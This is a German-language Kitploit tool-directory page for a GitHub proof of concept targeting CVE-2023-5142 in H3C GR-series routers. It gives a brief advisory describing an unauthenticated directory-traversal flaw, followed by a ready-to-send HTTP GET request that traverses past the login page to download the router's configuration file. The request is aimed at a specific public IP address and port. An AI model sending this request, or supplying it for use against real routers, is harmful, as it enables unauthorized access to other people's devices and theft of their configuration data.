Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-H3C-Report — PoC-Exploit für CVE-2023-5142, der H3C-GR-Serienrouter mit einer nicht authentifizierten Directory-Traversal-Schwachstelle angreift, um sensible Konfigurationsdateien zu extrahieren. | Kitploit
Tools/GitHubGitHub/kuangxiaotu/cve-h3c-report
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungFehlkonfiguration
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

PoC-Exploit für CVE-2023-5142, der H3C-GR-Serienrouter mit einer nicht authentifizierten Directory-Traversal-Schwachstelle angreift, um sensible Konfigurationsdateien zu extrahieren.

Repository anzeigen
24vor 3 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

H3C GR-Serie Router Systemverwaltung weist Schwachstelle für unbefugten Zugriff auf

Produkt: GR-Serie Router

Version: alle

Bewertung: hohes Risiko

Webseite: http://www.h3c.com/

Gefahren: Angreifer können diese Schwachstelle ausnutzen, um sensible Informationen von Routern zu erlangen, indem sie spezielle Anfragepakete erstellen, um die Identitätsprüfung zu umgehen.

Prinzip: Der Router hat den Verzeichniszugriff und zugehörige Dateien nicht authentifiziert

Exp:

Hinweis: Es ist notwendig, die Dateinamenerweiterung in POC zu ändern, z.B. GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

Tool herunterladen